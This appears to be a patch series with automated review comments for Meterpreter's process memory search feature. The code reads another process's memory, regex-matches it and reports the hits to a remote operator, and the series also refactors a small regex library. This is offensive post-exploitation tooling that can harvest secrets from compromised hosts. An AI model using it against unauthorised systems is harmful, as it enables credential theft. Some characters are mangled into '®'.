met_api->packet.add_tlv_raw(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_STR, (LPVOID)memory_buffer_ptr, (DWORD)match_length + 1); - - dprintf("[MEM SEARCH] Adding Match address"); met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR, match_address); - - dprintf("[MEM SEARCH] Adding Region base address"); met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_START_ADDR, memory_base_address); - - dprintf("[MEM SEARCH] Adding Region size"); met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_SECT_LEN, memory_region_size); - - dprintf("[MEM SEARCH] Adding Match Length"); met_api->packet.add_tlv_uint(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, (UINT)match_length); - dprintf("[MEM SEARCH] Adding Group"); - met_api->packet.add_group(*out, TLV_TYPE_MEMORY_SEARCH_RESULTS, search_results); - - return ERROR_SUCCESS; -} - -/// -/// Compile a regular expression in-place. -/// -/// A pointer to a regular expression needle struct. -/// ERROR_SUCCESS on success, ERROR_INVALID_PARAMETER when provided with a null pointer or the regular expression failed to compile -NTSTATUS re_compile_inplace(struct regex_needle** in_out) -{ - if (in_out == NULL) { return ERROR_INVALID_PARAMETER; } - const int compile_result = re_compile((*in_out)->raw_needle_buffer, (*in_out)->length, MAX_REGEXP_OBJECTS, MAX_CHAR_CLASS_LEN, &(*in_out)->compiled_needle, &(*in_out)->char_buf); - if (compile_result != ERROR_SUCCESS) { return ERROR_INVALID_PARAMETER; } - - return ERROR_SUCCESS; -} - -/// -/// Sets up a regular expression needle from a TLV. -/// -/// - Pointer to the needle TLV received from the server containing the needle buffer -/// - The compiled needle -/// ERROR_SUCCESS on success, non-zero on failure -NTSTATUS setup_needle_from_tlv(const Tlv* needle_buffer_tlv, struct regex_needle** out) -{ - // The header contains a null-terminator which we do not need. 
- dprintf("[MEM SEARCH] Getting needle length"); - const size_t needle_length = needle_buffer_tlv->header.length - 1; - if (needle_length == 0) { dprintf("[MEM SEARCH] Got a needle length of 0"); return ERROR_INVALID_PARAMETER; } - - (*out)->length = needle_length; - dprintf("[MEM SEARCH] Allocating memory for needle buffer"); - (*out)->raw_needle_buffer = (char*)malloc(needle_length * sizeof(char)); - if ((*out)->raw_needle_buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for raw needle buffer"); return ERROR_OUTOFMEMORY; } - - dprintf("[MEM SEARCH] Copying TLV buffer to needle"); - memcpy((*out)->raw_needle_buffer, (char*)needle_buffer_tlv->buffer, needle_length); - - dprintf("[MEM SEARCH] Allocating memory for a compiled needle"); - (*out)->compiled_needle = (regex_t*)malloc(MAX_REGEXP_OBJECTS * sizeof(struct regex_t)); - if ((*out)->compiled_needle == NULL) { dprintf("[MEM SEARCH] Unable to malloc memory for a compiled needle"); return ERROR_OUTOFMEMORY; } - - dprintf("[MEM SEARCH] Allocating memory for a char buffer"); - (*out)->char_buf = (unsigned char*)malloc(MAX_CHAR_CLASS_LEN * sizeof(unsigned char)); - if ((*out)->char_buf == NULL) { dprintf("[MEM SEARCH] Unable to malloc memory for a char buffer"); return ERROR_OUTOFMEMORY; } - - dprintf("[MEM SEARCH] Compiling needle: %.*s", needle_length, (char*)needle_buffer_tlv->buffer); - const NTSTATUS compile_result = re_compile_inplace(&(*out)); - if (compile_result != ERROR_SUCCESS) - { dprintf("[MEM SEARCH] Failed to compile needle"); return ERROR_INVALID_PARAMETER; } - - return ERROR_SUCCESS; -} - -NTSTATUS cleanup_needle(struct regex_needle** in) -{ - if (in == NULL || *in == NULL) { return ERROR_INVALID_PARAMETER; } - - if ((*in)->raw_needle_buffer != NULL) - { - dprintf("[MEM SEARCH] Freeing needle buffer"); - free((*in)->raw_needle_buffer); - } - - if ((*in)->char_buf != NULL) - { - dprintf("[MEM SEARCH] Freeing char buf"); - free((*in)->char_buf); - } - - if ((*in)->compiled_needle != 
NULL) - { - dprintf("[MEM SEARCH] Freeing compiled needle"); - free((*in)->compiled_needle); - } - - dprintf("[MEM SEARCH] Freeing regex needle."); - free((*in)); + met_api->packet.add_group(packet, TLV_TYPE_MEMORY_SEARCH_RESULTS, search_results); return ERROR_SUCCESS; } @@ -575,7 +480,7 @@ static CLOSEHANDLE fCloseHandle = NULL; static VIRTUALQUERYEX fVirtualQueryEx = NULL; static NTREADVIRTUALMEMORY fNtReadVirtualMemory = NULL; -BOOL setup_handles() +NTSTATUS setup_handles() { if ((hKernel32 = GetModuleHandleA("kernel32.dll")) == NULL) { dprintf("[MEM SEARCH] Could not get kernel32.dll handle"); return ERROR_INVALID_HANDLE; } 
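Review bot: `add_tlv_raw` is given `(DWORD)match_length + 1` bytes starting at `memory_buffer_ptr`, and the caller (`@@ -712` hunk below) places that pointer at `memory_buffer + current_buffer_offset + result`, where a match may end exactly at `bytes_read`; if `re_matchp` keeps offset plus length within `bytes_to_regex`, the extra byte is one past the match and, when `bytes_read == MEMORY_BUFFER_SIZE`, one past the allocation. Unless the trailing byte is deliberately reported, `(DWORD)match_length` is the length `TLV_TYPE_MEMORY_SEARCH_MATCH_LEN` already advertises; if it is intentional, the helper needs the remaining buffer length as a parameter so it can clamp. The `(LPVOID)` cast also discards the `const` the new parameter type introduced; check whether `add_tlv_raw` accepts a const pointer before casting it away.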
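Review bot: `NTSTATUS setup_handles()` is an unprototyped declaration; write `NTSTATUS setup_handles(void)`. The function returns Win32 codes such as `ERROR_INVALID_HANDLE` under the `NTSTATUS` type, as `add_needle_results_to_packet` does, so the file mixes two value spaces — a comment stating the convention, or a `DWORD` return type, would make it explicit. The body continues outside the hunk.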
@@ -606,29 +511,24 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) { Packet* response = met_api->packet.create_response(packet); DWORD result = ERROR_SUCCESS; - char* buffer = NULL; + unsigned char* memory_buffer = NULL; size_t needle_enum_index = 0; HANDLE process_handle = NULL; - struct regex_needle* regex_needles[NEEDLES_MAX]; + RegexNeedle regex_needles[NEEDLES_MAX] = { NULL }; dprintf("[MEM SEARCH] Getting PID"); const DWORD pid = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_PID); if (pid == 0) { result = ERROR_INVALID_PARAMETER; goto done; } dprintf("[MEM SEARCH] Searching PID: %lu", pid); - Tlv needle_buffer_tlv = { 0 }; - while (needle_enum_index < NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_buffer_tlv) == ERROR_SUCCESS) + Tlv needle_tlv = { 0 }; + while (needle_enum_index < NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_tlv) == ERROR_SUCCESS) { - dprintf("[MEM SEARCH] Allocating %u bytes of memory for regex needle", sizeof(struct regex_needle)); - regex_needles[needle_enum_index] = (struct regex_needle*)malloc(sizeof(struct regex_needle)); - if (regex_needles[needle_enum_index] == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for regex needle"); result = ERROR_OUTOFMEMORY; goto done; } - - dprintf("[MEM SEARCH] Setting up needle from TLV"); - const NTSTATUS needle_setup_result = setup_needle_from_tlv(&needle_buffer_tlv, ®ex_needles[needle_enum_index]); - if (needle_setup_result != ERROR_SUCCESS) + dprintf("[MEM SEARCH] Compiling needle regex from TLV"); + const int result = re_compile(needle_tlv.buffer, needle_tlv.header.length - 1, (re_t)®ex_needles[needle_enum_index].compiled_regex, (unsigned char*)®ex_needles[needle_enum_index].buffer); + if (result != ERROR_SUCCESS) { - dprintf("[MEM SEARCH] Failed to setup needle from TLV packet"); - result = needle_setup_result; + 
dprintf("[MEM SEARCH] Failed to setup compile needle regex from TLV packet"); goto done; } @@ -642,8 +542,11 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) const size_t current_max_match_length = max_match_length; dprintf("[MEM SEARCH] Getting handles & proc addresses"); - const NTSTATUS setup_handles_result = setup_handles(); - if (setup_handles_result != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Could not set up all necessary handles & proc addresses"); result = setup_handles_result; goto done; } + if ((result = setup_handles()) != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Could not set up all necessary handles & proc addresses"); + goto done; + } const DWORD process_vm_read = 0x0010; const DWORD process_query_information = 0x0400; @@ -655,8 +558,8 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) MEMORY_BASIC_INFORMATION mem = { 0 }; dprintf("[MEM SEARCH] Allocating buffer for storing process memory"); - buffer = (char*)malloc(MEMORY_BUFFER_SIZE); - if (buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory buffer"); result = ERROR_OUTOFMEMORY; goto done; } + memory_buffer = (unsigned char*)malloc(MEMORY_BUFFER_SIZE * sizeof(unsigned char)); + if (memory_buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory buffer"); result = ERROR_OUTOFMEMORY; goto done; } for (size_t current_ptr = 0; fVirtualQueryEx(process_handle, (LPCVOID)current_ptr, &mem, sizeof(mem)); current_ptr += mem.RegionSize) { 
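Review bot: `const int result = re_compile(...)` inside the loop shadows the function's `DWORD result`, so when a needle fails to compile the `goto done` transmits the outer `result`, still `ERROR_SUCCESS`, and the client sees a successful search with no hits; the removed code set `result = needle_setup_result` at this point. The `needle_length == 0` guard from the deleted `setup_needle_from_tlv` is also gone, so `needle_tlv.header.length - 1` is passed unchecked (a length of 0 would wrap if the field is unsigned). Rename the inner variable, set the outer status before the jump, and reject short needles before compiling; the enclosing `while` continues past the hunk.
```c
        if (needle_tlv.header.length < 2) { dprintf("[MEM SEARCH] Got an empty needle"); result = ERROR_INVALID_PARAMETER; goto done; }

        dprintf("[MEM SEARCH] Compiling needle regex from TLV");
        const int compile_result = re_compile(needle_tlv.buffer, needle_tlv.header.length - 1, (re_t)&regex_needles[needle_enum_index].compiled_regex, (unsigned char*)&regex_needles[needle_enum_index].buffer);
        if (compile_result != ERROR_SUCCESS)
        {
            dprintf("[MEM SEARCH] Failed to compile needle regex from TLV packet");
            result = ERROR_INVALID_PARAMETER;
            goto done;
        }
        // … unchanged: rest of the needle loop …
```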
@@ -670,15 +573,19 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) while (mem.RegionSize > memory_region_offset) { const size_t leftover_bytes = mem.RegionSize - memory_region_offset; - const size_t bytes_to_read = min(leftover_bytes, MEMORY_BUFFER_SIZE); + const size_t bytes_to_read = min(leftover_bytes, MEMORY_BUFFER_SIZE * sizeof(unsigned char)); dprintf("[MEM SEARCH] Leftover Bytes count: %llu", leftover_bytes); dprintf("[MEM SEARCH] Bytes to read: %llu", bytes_to_read); size_t bytes_read = 0; const size_t read_address = (size_t)mem.BaseAddress + memory_region_offset; // Note: This will read up to a maximum of bytes_to_read OR to the end of the memory region if the end of it has been reached. - const NTSTATUS read_virtual_memory_status = fNtReadVirtualMemory(process_handle, (LPCVOID)read_address, buffer, bytes_to_read, &bytes_read); - if (read_virtual_memory_status != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Failed to read some virtual memory for process, skipping %u bytes", bytes_to_read); memory_region_offset += bytes_to_read; continue; } + if (fNtReadVirtualMemory(process_handle, (LPCVOID)read_address, memory_buffer, bytes_to_read, &bytes_read) != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Failed to read some virtual memory for process, skipping %u bytes", bytes_to_read); + memory_region_offset += bytes_to_read; + continue; + } dprintf("[MEM SEARCH] Read %llu bytes", bytes_read); // Note: Increment the offset so that we aren't stuck in an infinite loop, trying to read zero bytes from the same pointer. 
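Review bot: The new failure-path `dprintf` formats `bytes_to_read` (a `size_t`) with `%u`, which mismatches the argument type; the neighbouring lines use `%llu` for the same variables, so use `dprintf("[MEM SEARCH] Failed to read some virtual memory for process, skipping %llu bytes", bytes_to_read);` (or `%zu`). Comparing the `NTSTATUS` from `fNtReadVirtualMemory` with `ERROR_SUCCESS` works only because both are zero; `NT_SUCCESS()` states the intent, and if the call can report a partial copy with `bytes_read > 0` those bytes are currently discarded — presumably worth searching before skipping the chunk, to be confirmed. The enclosing `while` starts before the hunk.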
@@ -692,10 +599,10 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) do { - const char* current_buffer_ptr = buffer + current_buffer_offset; + const unsigned char* current_buffer_ptr = memory_buffer + current_buffer_offset; const size_t bytes_to_regex = bytes_read - current_buffer_offset; - result = re_matchp(regex_needles[current_needle_index]->compiled_needle, current_buffer_ptr, bytes_to_regex, &match_length); + result = re_matchp((re_t)®ex_needles[current_needle_index].compiled_regex, current_buffer_ptr, bytes_to_regex, &match_length); if (result != -1) { @@ -712,9 +619,11 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) // TODO: Add a workaround for match length to the regex itself, allowing the regex engine to stop matching once an upper limit has been reached. const size_t current_match_length = min(max_match_length, match_length); - const char* memory_buffer_ptr = buffer + current_buffer_offset + result; - const NTSTATUS add_needles_result = add_needle_results_to_packet(&response, memory_buffer_ptr, current_match_length, match_address, (size_t)mem.BaseAddress, mem.RegionSize); - if (add_needles_result != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Adding search results to packet was not successful"); } + const unsigned char* memory_buffer_ptr = memory_buffer + current_buffer_offset + result; + if (add_needle_results_to_packet(response, memory_buffer_ptr, current_match_length, match_address, (size_t)mem.BaseAddress, mem.RegionSize) != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Adding search results to packet was not successful"); + } current_buffer_offset += (result + current_match_length); } 
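Review bot: `result = re_matchp(...)` stores the match offset (or -1) in the function's status variable, the same `DWORD result` that `transmit_response(result, ...)` sends at `done:` (`@@ -731` hunk below); unless `result` is reset after the search loop outside these hunks, a search whose final `re_matchp` returned -1 reports `0xFFFFFFFF` as its status. A dedicated `int match_offset = re_matchp(...)` with `if (match_offset != -1)` keeps status and index apart and avoids the signed/unsigned comparison with -1. `current_buffer_ptr` is now `const unsigned char*` while `re_matchp` takes `const char*`, so the call relies on an implicit incompatible-pointer conversion; cast at the call or change `re_matchp` to take `const unsigned char*`. The enclosing `do` loop starts before the hunk.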
@@ -731,16 +640,9 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) done: dprintf("[MEM SEARCH] Memory Search complete."); - if (buffer != NULL) { dprintf("[MEM SEARCH] Freeing process memory buffer."); free(buffer); } + if (memory_buffer != NULL) { dprintf("[MEM SEARCH] Freeing process memory buffer."); free(memory_buffer); } if (process_handle != NULL) { dprintf("[MEM SEARCH] Closing process handle."); fCloseHandle(process_handle); } - dprintf("[MEM SEARCH] Cleaning up needles"); - for (size_t i = 0; i < needle_enum_index; i++) - { - const NTSTATUS cleanup_result = cleanup_needle(®ex_needles[i]); - if (cleanup_result == ERROR_INVALID_PARAMETER) { dprintf("[MEM SEARCH] Could not clean up needle"); } - } - dprintf("[MEM SEARCH] Transmitting response"); met_api->packet.transmit_response(result, remote, response); return ERROR_SUCCESS; diff --git a/c/meterpreter/source/tiny-regex-c/re.c b/c/meterpreter/source/tiny-regex-c/re.c index b5fd887c3..4c13e11a3 100644 --- a/c/meterpreter/source/tiny-regex-c/re.c +++ b/c/meterpreter/source/tiny-regex-c/re.c @@ -62,7 +62,7 @@ int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchl return ((matchpattern(&pattern[1], text, text_length, 0, matchlength)) ? 0 : -1); } - size_t idx = -1; + int idx = -1; do { @@ -70,18 +70,16 @@ int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchl if (matchpattern(pattern, text, text_length, idx, matchlength)) { - return (int)idx; + return idx; } } - while (idx < text_length); + while ((size_t)idx < text_length); return -1; } -int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_objects, size_t max_char_class_len, re_t* out_compiled, unsigned char** out_ccl) +int re_compile(const char* pattern, size_t pattern_length, re_t compiled_regex, unsigned char* regex_char_buffer) { - if (out_compiled == NULL || out_ccl == NULL) { return 1; } - int ccl_bufidx = 1; char c; /* current char in pattern */ 
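Review bot: The new `re_compile` signature drops the `out_compiled == NULL || out_ccl == NULL` guard without a replacement, so a null `compiled_regex` or `regex_char_buffer` is dereferenced on the first pattern symbol; keep `if (compiled_regex == NULL || regex_char_buffer == NULL) { return 1; }` at the top, since the function is exported through re.h. In `re_matchp`, `int idx = -1` paired with `while ((size_t)idx < text_length)` means `idx++` overflows (undefined behaviour) for a text longer than `INT_MAX`; the current caller caps reads at 64 MiB, but rejecting `text_length > INT_MAX` up front would make the function safe on its own. The body of `re_compile` continues into the following hunks.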
@@ -95,13 +93,13 @@ int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_obje switch (c) { /* Meta-characters: */ - case '^': { (*out_compiled)[j].type = BEGIN; } break; - case '$': { (*out_compiled)[j].type = END; } break; - case '.': { (*out_compiled)[j].type = DOT; } break; - case '*': { (*out_compiled)[j].type = STAR; } break; - case '+': { (*out_compiled)[j].type = PLUS; } break; - case '?': { (*out_compiled)[j].type = QUESTIONMARK; } break; - /* case '|': { re_compiled[j].type = BRANCH; } break; <-- not working properly */ + case '^': { compiled_regex[j].type = BEGIN; } break; + case '$': { compiled_regex[j].type = END; } break; + case '.': { compiled_regex[j].type = DOT; } break; + case '*': { compiled_regex[j].type = STAR; } break; + case '+': { compiled_regex[j].type = PLUS; } break; + case '?': { compiled_regex[j].type = QUESTIONMARK; } break; + /* case '|': { compiled_regex[j].type = BRANCH; } break; <-- not working properly */ /* Escaped character-classes (\s \w ...): */ case '\\': 
@@ -114,25 +112,25 @@ int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_obje switch (pattern[i]) { /* Meta-character: */ - case 'd': { (*out_compiled)[j].type = DIGIT; } break; - case 'D': { (*out_compiled)[j].type = NOT_DIGIT; } break; - case 'w': { (*out_compiled)[j].type = ALPHA; } break; - case 'W': { (*out_compiled)[j].type = NOT_ALPHA; } break; - case 's': { (*out_compiled)[j].type = WHITESPACE; } break; - case 'S': { (*out_compiled)[j].type = NOT_WHITESPACE; } break; + case 'd': { compiled_regex[j].type = DIGIT; } break; + case 'D': { compiled_regex[j].type = NOT_DIGIT; } break; + case 'w': { compiled_regex[j].type = ALPHA; } break; + case 'W': { compiled_regex[j].type = NOT_ALPHA; } break; + case 's': { compiled_regex[j].type = WHITESPACE; } break; + case 'S': { compiled_regex[j].type = NOT_WHITESPACE; } break; /* Escaped character, e.g. '.' or '$' */ default: { - (*out_compiled)[j].type = CHAR_RE; - (*out_compiled)[j].u.ch = pattern[i]; + compiled_regex[j].type = CHAR_RE; + compiled_regex[j].u.ch = pattern[i]; } break; } } else { - (*out_compiled)[j].type = CHAR_RE; - (*out_compiled)[j].u.ch = pattern[i]; + compiled_regex[j].type = CHAR_RE; + compiled_regex[j].u.ch = pattern[i]; } } break; @@ -145,7 +143,7 @@ int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_obje /* Look-ahead to determine if negated */ if (pattern[i + 1] == '^') { - (*out_compiled)[j].type = INV_CHAR_CLASS; + compiled_regex[j].type = INV_CHAR_CLASS; i += 1; /* Increment i to avoid including '^' in the char-buffer */ if (i + 1 == (int)pattern_length) /* incomplete pattern, missing non-zero char after '^' */ { @@ -154,7 +152,7 @@ int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_obje } else { - (*out_compiled)[j].type = CHAR_CLASS; + compiled_regex[j].type = CHAR_CLASS; } /* Copy characters inside [..] to buffer */ 
@@ -172,14 +170,14 @@ int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_obje { return 1; } - (*out_ccl)[ccl_bufidx++] = pattern[i++]; + regex_char_buffer[ccl_bufidx++] = pattern[i++]; } else if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) { //fputs("exceeded internal buffer!\n", stderr); return 1; } - (*out_ccl)[ccl_bufidx++] = pattern[i]; + regex_char_buffer[ccl_bufidx++] = pattern[i]; } if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) { @@ -188,15 +186,15 @@ int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_obje return 1; } /* Null-terminate string end */ - (*out_ccl)[ccl_bufidx++] = 0; - (*out_compiled)[j].u.ccl = &(*out_ccl)[buf_begin]; + regex_char_buffer[ccl_bufidx++] = 0; + compiled_regex[j].u.ccl = ®ex_char_buffer[buf_begin]; } break; /* Other characters: */ default: { - (*out_compiled)[j].type = CHAR_RE; - (*out_compiled)[j].u.ch = c; + compiled_regex[j].type = CHAR_RE; + compiled_regex[j].u.ch = c; } break; } @@ -204,7 +202,7 @@ int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_obje j += 1; } /* 'UNUSED' is a sentinel used to indicate end-of-pattern */ - (*out_compiled)[j].type = UNUSED; + compiled_regex[j].type = UNUSED; return 0; // ERROR_SUCCESS } @@ -364,7 +362,7 @@ static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_ const char* prepoint = text; while ((text_offset < text_length) && matchone(p, text[text_offset])) { - text_offset++; + text_offset++; (*matchlength)++; } while (&text[text_offset] >= prepoint) @@ -383,7 +381,7 @@ static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_ const char* prepoint = text; while ((text_offset < text_length) && matchone(p, text[text_offset])) { - text_offset++; + text_offset++; (*matchlength)++; } while (text > prepoint) diff --git a/c/meterpreter/source/tiny-regex-c/re.h b/c/meterpreter/source/tiny-regex-c/re.h index 45b8cdf11..28956d263 100644 --- a/c/meterpreter/source/tiny-regex-c/re.h 
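Review bot: In the escape branch the new code stores two bytes per iteration — `regex_char_buffer[ccl_bufidx++] = pattern[i++];` followed unconditionally by `regex_char_buffer[ccl_bufidx++] = pattern[i];` — but the only guard visible before that second store is the `else if (ccl_bufidx >= MAX_CHAR_CLASS_LEN)` branch, which the escape path does not take. The check guarding the first store sits just above this hunk; unless it compares against `MAX_CHAR_CLASS_LEN - 1`, a character class made of many escaped characters writes one byte past the end of the caller's buffer before the post-loop `ccl_bufidx >= MAX_CHAR_CLASS_LEN` check can reject it. Likewise `pattern[i++]` followed by `pattern[i]` reads one byte past `pattern_length` when the backslash is the last byte of the pattern, unless the loop condition (also outside the hunk) already excludes that — worth confirming, since the pattern arrives from the operator over the session rather than from a trusted constant. The enclosing `case '['` block starts before this hunk.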
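Review bot: The end-of-pattern sentinel `compiled_regex[j].type = UNUSED;` is stored at index `j` after the loop exits, so the loop must stop while `j` is still at least one below the caller's array capacity; with the capacity parameter removed from `re_compile`, that bound is implicit and the loop condition that enforces it is outside this hunk. A one-line comment above the store, `/* The loop above must stop one entry early: this sentinel needs a free slot. */`, would make the contract visible at the point where an off-by-one becomes an out-of-bounds write. `re_compile` begins before this hunk.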
+++ b/c/meterpreter/source/tiny-regex-c/re.h @@ -62,7 +62,7 @@ typedef struct regex_t* re_t; int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength); /* Compile a regular expression in-place, allowing for multiple needles to be compiled without the usage of a static buffer. Returns ERROR_SUCCESS (0) on success, else 1. */ -int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_objects, size_t max_char_class_len, re_t* out_compiled, unsigned char** out_ccl); +int re_compile(const char* pattern, size_t pattern_length, re_t compiled_regex, unsigned char* regex_char_buffer); #ifdef __cplusplus } From 92d04de09cc9ad68c94cc7c329dfcd7f1b1158b7 Mon Sep 17 00:00:00 2001 From: sjanusz-r7 Date: Mon, 11 Dec 2023 13:30:44 +0000 Subject: [PATCH 04/14] Add maximum match length limit to regex matcher --- .../stdapi/server/sys/process/memory.c | 10 ++--- c/meterpreter/source/tiny-regex-c/re.c | 43 ++++++++++--------- c/meterpreter/source/tiny-regex-c/re.h | 2 +- 3 files changed, 27 insertions(+), 28 deletions(-) diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c index e592dd4ce..15cf165ad 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c @@ -601,8 +601,8 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) { const unsigned char* current_buffer_ptr = memory_buffer + current_buffer_offset; const size_t bytes_to_regex = bytes_read - current_buffer_offset; - - result = re_matchp((re_t)®ex_needles[current_needle_index].compiled_regex, current_buffer_ptr, bytes_to_regex, &match_length); + + result = re_matchp((re_t)®ex_needles[current_needle_index].compiled_regex, current_buffer_ptr, bytes_to_regex, current_max_match_length, &match_length); if (result != -1) { 
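Review bot: The prototype comment still describes only the compile-in-place behaviour, but `re_compile` now receives bare `compiled_regex` and `regex_char_buffer` pointers with no capacities, so this comment is the only place the buffer contract can be stated. I would extend it with: `/* compiled_regex and regex_char_buffer are caller-owned. regex_char_buffer must hold at least MAX_CHAR_CLASS_LEN bytes and compiled_regex at least the header's object limit plus the end-of-pattern sentinel; re_compile bounds-checks only against those constants. Neither pointer may be NULL. */`. The exact object-limit name is defined above this hunk and should be used verbatim in the comment.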
@@ -617,15 +617,13 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet)
 continue;
 }
- // TODO: Add a workaround for match length to the regex itself, allowing the regex engine to stop matching once an upper limit has been reached.
- const size_t current_match_length = min(max_match_length, match_length);
 const unsigned char* memory_buffer_ptr = memory_buffer + current_buffer_offset + result;
- if (add_needle_results_to_packet(response, memory_buffer_ptr, current_match_length, match_address, (size_t)mem.BaseAddress, mem.RegionSize) != ERROR_SUCCESS)
+ if (add_needle_results_to_packet(response, memory_buffer_ptr, match_length, match_address, (size_t)mem.BaseAddress, mem.RegionSize) != ERROR_SUCCESS)
 {
 dprintf("[MEM SEARCH] Adding search results to packet was not successful");
 }
- current_buffer_offset += (result + current_match_length);
+ current_buffer_offset += (result + match_length);
 }
 } while (result != -1);
diff --git a/c/meterpreter/source/tiny-regex-c/re.c b/c/meterpreter/source/tiny-regex-c/re.c
index 4c13e11a3..98eaf66cd 100644
--- a/c/meterpreter/source/tiny-regex-c/re.c
+++ b/c/meterpreter/source/tiny-regex-c/re.c
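Review bot: `current_buffer_offset += (result + match_length);` no longer clamps through `min()`, but the problem it keeps is that a pattern which can match the empty string (`a*`, `x?`) returns `result == 0` with `match_length == 0`, so the offset never advances and the `do ... while (result != -1)` loop spins forever inside the agent — a single mistyped needle turns into a denial of service of the session and a pegged CPU on the target. The same zero-step advance is on the `continue` branch just above this hunk. Guarantee progress on both lines, e.g. `current_buffer_offset += (result + (match_length > 0 ? match_length : 1));`. The enclosing loop and `request_sys_process_memory_search` begin before this hunk.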
@@ -37,10 +37,10 @@ enum { UNUSED, DOT, BEGIN, END, QUESTIONMARK, STAR, PLUS, CHAR_RE, CHAR_CLASS, INV_CHAR_CLASS, DIGIT, NOT_DIGIT, ALPHA, NOT_ALPHA, WHITESPACE, NOT_WHITESPACE, /* BRANCH */ };
 /* Private function declarations: */
-static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength);
+static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_size, size_t* matchlength);
 static int matchcharclass(char c, const char* str);
-static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength);
-static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength);
+static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_size, size_t* matchlength);
+static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_size, size_t* matchlength);
 static int matchone(regex_t p, char c);
 static int matchdigit(char c);
 static int matchalpha(char c);
@@ -51,15 +51,16 @@ static int matchdot(char c);
 static int ismetachar(char c);
 /* Public functions: */
-int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength)
+int re_matchp(re_t pattern, const char* text, size_t text_length, size_t max_match_length, size_t* matchlength)
 {
+ if (max_match_length == 0) { return -1; }
 *matchlength = 0;
 if (pattern == 0 || text_length == 0) { return -1; }
 if (pattern[0].type == BEGIN)
 {
- return ((matchpattern(&pattern[1], text, text_length, 0, matchlength)) ? 0 : -1);
+ return ((matchpattern(&pattern[1], text, text_length, 0, max_match_length, matchlength)) ? 0 : -1);
 }
 int idx = -1;
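Review bot: The new `if (max_match_length == 0) { return -1; }` runs before `*matchlength = 0;`, so that early return leaves the caller's length untouched, unlike every other `-1` path in `re_matchp`; the caller in memory.c initialises `match_length` once outside its matching loop, so a stale value from an earlier hit could survive. Move the reset first and fold the guards together: `*matchlength = 0; if (max_match_length == 0 || pattern == 0 || text_length == 0) { return -1; }`. `re_matchp` continues past the end of this hunk.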
@@ -68,7 +69,7 @@ int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchl
 {
 idx += 1;
- if (matchpattern(pattern, text, text_length, idx, matchlength))
+ if (matchpattern(pattern, text, text_length, idx, max_match_length, matchlength))
 {
 return idx;
 }
@@ -356,18 +357,18 @@ static int matchone(regex_t p, char c)
 }
 }
-static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength)
+static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength)
 {
 size_t prelen = *matchlength;
 const char* prepoint = text;
- while ((text_offset < text_length) && matchone(p, text[text_offset]))
+ while ((text_offset < text_length) && (max_match_length > *matchlength) && matchone(p, text[text_offset]))
 {
 text_offset++; (*matchlength)++;
 }
 while (&text[text_offset] >= prepoint)
 {
- if (matchpattern(pattern, text, text_length, text_offset--, matchlength))
+ if (matchpattern(pattern, text, text_length, text_offset--, max_match_length, matchlength))
 return 1;
 (*matchlength)--;
 }
